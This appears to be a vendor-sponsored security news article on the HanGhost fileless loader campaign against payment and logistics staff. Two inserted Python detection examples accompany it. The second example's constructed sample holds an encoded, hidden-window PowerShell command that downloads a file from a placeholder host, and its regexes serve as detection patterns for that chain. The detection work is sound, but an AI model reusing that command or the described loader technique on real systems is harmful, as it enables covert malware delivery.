Malware, Apr 15, 2026

Active HanGhost Loader Campaign Targets Enterprise Payment and Logistics Workflows

HanGhost loader campaign actively targets enterprise payment and logistics workflows with fileless attacks.

Summary

A new HanGhost loader campaign is actively targeting corporate environments, specifically employees in payments, logistics, and contract operations. The attack uses obfuscated JavaScript and PowerShell to execute a .NET loader in memory, delivering multiple malware families including PureHVNC, XWorm, Meduza, AgentTesla, and Phantom without writing artifacts to disk. The campaign deliberately targets finance and operations roles to gain access to financial processes, transaction systems, and operational workflows.

Full text

Active HanGhost Loader campaign targets enterprise payment and logistics workflows with fileless attacks, multi-stage execution, and stealthy malware delivery.

by Owais Sultan, April 15, 2026

Disclosure: This article was provided by ANY.RUN. The information and analysis presented are based on their research and findings.

A new malware campaign built around the HanGhost loader is actively targeting corporate environments, focusing on employees involved in payments, logistics, and contract operations. The attack is designed to operate without leaving clear artifacts, allowing it to reach systems linked to revenue and operations before being fully analyzed. The campaign has already shown multiple waves of activity with different malware families, indicating active development and scaling rather than a one-off attack.

How the Attack Unfolds and Why Most SOCs See It Too Late

The attack chain combines multiple techniques that individually look benign but together create a highly evasive execution flow.

[Figure: full attack analysis inside the ANY.RUN sandbox]

[Figure: the attack utilizes scripts and PowerShell]

It starts with obfuscated JavaScript that executes hidden PowerShell commands. These commands execute a .NET loader directly in memory, which then retrieves a seemingly harmless image file containing an encrypted payload. The payload is extracted and executed without ever being written to disk.

[Figure: the malware payload hides inside an image]

This chain is used to deliver multiple malware families, including PureHVNC, XWorm, Meduza, AgentTesla, and Phantom, with some cases also deploying UltraVNC for persistent remote access. Because each stage looks benign on its own, the resulting alerts are either low priority or lack enough context, which slows down triage and delays response.

Reduce detection gaps in your SOC with cross-platform threat visibility using ANY.RUN’s sandbox.
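The article does not say how the payload is embedded in the image; one common carrier technique is to append the encrypted blob after the image's end-of-file marker, which keeps the file rendering normally while carrying arbitrary data. The following added example (not ANY.RUN's or the article's code) checks PNG files for a long, high-entropy trailer after the IEND chunk; the 1x1 PNG and the pseudo-random "payload" it is tested against are constructed, and the 64-byte and 7.0-bit thresholds are assumptions to tune per environment.

```python
import math
import random
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def png_end_offset(data):
    """Walk the chunk list and return the offset just past IEND, or None if not a well-formed PNG."""
    if not data.startswith(PNG_SIG):
        return None
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4  # length/type header, chunk data, CRC
        if ctype == b"IEND":
            return pos if pos <= len(data) else None
    return None

def shannon_entropy(buf):
    """Bits per byte: encrypted or compressed data sits close to 8.0, text and padding far below."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    return -sum(c / len(buf) * math.log2(c / len(buf)) for c in counts if c)

def inspect_image(data, min_trailer=64, entropy_threshold=7.0):
    """Flag a long, high-entropy trailer after IEND; the image still renders, so the file looks harmless."""
    end = png_end_offset(data)
    if end is None:
        return {"format": "unknown", "trailer_len": 0, "trailer_entropy": 0.0, "suspicious": False}
    trailer = data[end:]
    ent = shannon_entropy(trailer)
    return {"format": "png", "trailer_len": len(trailer), "trailer_entropy": round(ent, 2),
            "suspicious": len(trailer) >= min_trailer and ent >= entropy_threshold}

def _chunk(ctype, body):
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))

def build_minimal_png():
    """Constructed 1x1 grayscale PNG used as the clean sample."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # one filter byte + one pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")

CLEAN_PNG = build_minimal_png()
# Constructed stand-in for an encrypted payload: seeded pseudo-random bytes, not real malware.
_rng = random.Random(1234)
FAKE_PAYLOAD = bytes(_rng.getrandbits(8) for _ in range(4096))
CARRIER_PNG = CLEAN_PNG + FAKE_PAYLOAD
```

A trailer check of this kind is a triage aid, not a verdict: a legitimate file with a few stray bytes after IEND stays below both thresholds, while a carrier with kilobytes of ciphertext does not.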
Attackers Are Targeting Finance and Operations Roles in Businesses

The targeting model is deliberate. Instead of aiming at infrastructure or privileged admins, attackers focus on users who interact with financial processes and operational systems on a daily basis. These users regularly execute scripts, open attachments, and communicate externally, which makes malicious activity harder to distinguish from normal behavior. Once compromised, their access can be used to influence transactions, documents, and internal workflows.

  • Persistent remote access: Tools like PureHVNC and XWorm allow continuous monitoring and control
  • Payment systems exposure: Attackers can intercept or modify transaction details during execution
  • Contract manipulation risk: Access to documents and email threads enables unauthorized changes or fraud
  • Logistics disruption: Compromised workflows can delay shipments and break operational processes

The impact is linked directly to how these roles interact with business processes, not just system access.

3 Steps CISOs Need to Take to Detect and Stop HanGhost Early

Stopping HanGhost requires changing how triage, response, and threat hunting actually work under pressure. The attack succeeds because teams spend too much time validating signals and not enough time understanding behavior early.

Fix Triage to Show Behavior, Not Indicators

Analysts cannot rely on hashes, domains, or reputation for this type of attack because most of the chain runs in memory and constantly changes. Triage has to start with execution.

[Figure: ANY.RUN’s Interactive Sandbox exposes HanGhost’s malicious activities in seconds]

Suspicious files, scripts, and links need to be detonated immediately in an interactive sandbox so the team can see the real process chain, network activity, and hidden stages.
ANY.RUN’s Interactive Sandbox provides SOC teams with a fast, integration-ready solution for detecting malware and phishing attacks inside fully interactive virtual environments across Windows, macOS, Linux, and Android. Thanks to its advanced detection capabilities, Tier 1 analysts can quickly validate alerts, emails, files, and URLs in minutes and keep MTTR short, preventing the attack from evolving into a business security breach.

Rebuild Response Around the Full Execution Chain

Containment decisions cannot be based on isolated alerts or single indicators. Teams need to see the full execution chain, from the initial script to the final payload, and use that to define scope and response actions.

[Figure: ANY.RUN’s sandbox details the attack TTPs to speed up response]

Threat intelligence connects infrastructure, behaviors, and related activity, allowing responders to understand how far the attack may have spread and what needs to be blocked beyond the initial entry point.

Turn Threat Hunting into a Continuation of Real Incidents

Threat hunting should not rely on generic techniques when dealing with active campaigns like this. It needs to start from confirmed behavior observed during triage and response. Once one case is identified, teams should immediately search for the same execution patterns across the environment and use threat intelligence to identify related activity seen in other organizations.

ANY.RUN’s TI Lookup provides SOC teams with the latest attack intel from 15,000 organizations, delivering instant, actionable context on over 40 types of IOCs and giving an industry and geo threat landscape view. This expands detection coverage and reduces the chance of missed compromises.

[Figure: ANY.RUN’s TI Lookup gives SOC teams industry and geo attack context]

When combined, these capabilities shift SOC operations from reactive validation to proactive understanding.
That shift is what reduces dwell time, lowers incident cost, and prevents attacks from reaching business-critical systems.

Conclusion

HanGhost uses a multi-stage, fileless execution chain to deliver remote access malware and credential stealers while avoiding traditional detection. By combining obfuscated scripts, in-memory loaders, and payloads hidden inside image files, it allows attackers to reach systems linked to payments, contracts, and operations without leaving clear artifacts.

To stop this type of attack early, SOC teams need to execute suspicious files and scripts in a controlled environment to expose real behavior, and use real-time threat intelligence to understand how the activity connects to ongoing campaigns. This allows teams to detect the attack earlier, scope it correctly, and respond before it spreads further.
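The threat-hunting step above says to take the execution pattern confirmed in one case and search for it across the environment. As an added example (not ANY.RUN's or the article's code), the following hunt runs over process-creation telemetry of the kind Sysmon or an EDR records (parent image, image, command line) and flags the chain the article describes: a Windows Script Host process (wscript.exe or cscript.exe, which run .js files) spawning PowerShell with a hidden window or an encoded command whose decoded text fetches an image from a remote host. The event field names and the sample events are constructed, and the domain is a placeholder.

```python
import base64
import re
from collections import defaultdict

# Windows Script Host binaries that run the obfuscated JavaScript stage, and the PowerShell hosts they spawn.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
HIDDEN_OR_ENCODED = re.compile(r"-(?:w|windowstyle)\s+hidden|-(?:e|ec|enc|encodedcommand)\s", re.I)
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
IMAGE_URL = re.compile(r"https?://\S+\.(?:png|jpe?g|gif|bmp)\b", re.I)

def decode_encoded_command(cmdline):
    """-EncodedCommand carries base64 of UTF-16LE text; return it, or '' if absent or malformed."""
    m = ENCODED_ARG.search(cmdline)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le") if m else ""
    except (ValueError, UnicodeDecodeError):
        return ""

def matches_hanghost_chain(event):
    """Return the reasons an event fits the script-host -> PowerShell -> image-download chain ([] = no match)."""
    if event["parent_image"].lower() not in SCRIPT_HOSTS or event["image"].lower() not in POWERSHELL:
        return []
    cmd = event["command_line"]
    reasons = ["script host spawned PowerShell"]
    if HIDDEN_OR_ENCODED.search(cmd):
        reasons.append("hidden window or encoded command")
    if IMAGE_URL.search(decode_encoded_command(cmd)):
        reasons.append("encoded command fetches a remote image file")
    return reasons

def hunt(events):
    """Group matching events by host so one confirmed case can be searched for estate-wide."""
    hits = defaultdict(list)
    for ev in events:
        reasons = matches_hanghost_chain(ev)
        if reasons:
            hits[ev["host"]].append((ev["command_line"], reasons))
    return dict(hits)

def _enc(text):  # PowerShell expects base64 of UTF-16LE; used only to build the constructed sample
    return base64.b64encode(text.encode("utf-16-le")).decode()

# Constructed process-creation events, not real telemetry; the domain is a placeholder.
SAMPLE_EVENTS = [
    {"host": "FIN-WS-01", "parent_image": "wscript.exe", "image": "powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + _enc("$d=(New-Object Net.WebClient).DownloadData('http://cdn.example.invalid/banner.png')")},
    {"host": "LOG-WS-07", "parent_image": "explorer.exe", "image": "powershell.exe",
     "command_line": "powershell.exe -File C:\\Scripts\\inventory.ps1"},
]
```

Because the match is on parent/child relationship and decoded command content rather than on hashes or domains, it survives the per-victim changes the article says make indicator-based triage unreliable.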

Indicators of Compromise

  • malware — HanGhost
  • malware — PureHVNC
  • malware — XWorm
  • malware — Meduza
  • malware — AgentTesla
  • malware — Phantom
  • malware — UltraVNC

Entities

  • HanGhost Loader Campaign (campaign)
  • PowerShell (technology)
  • .NET (technology)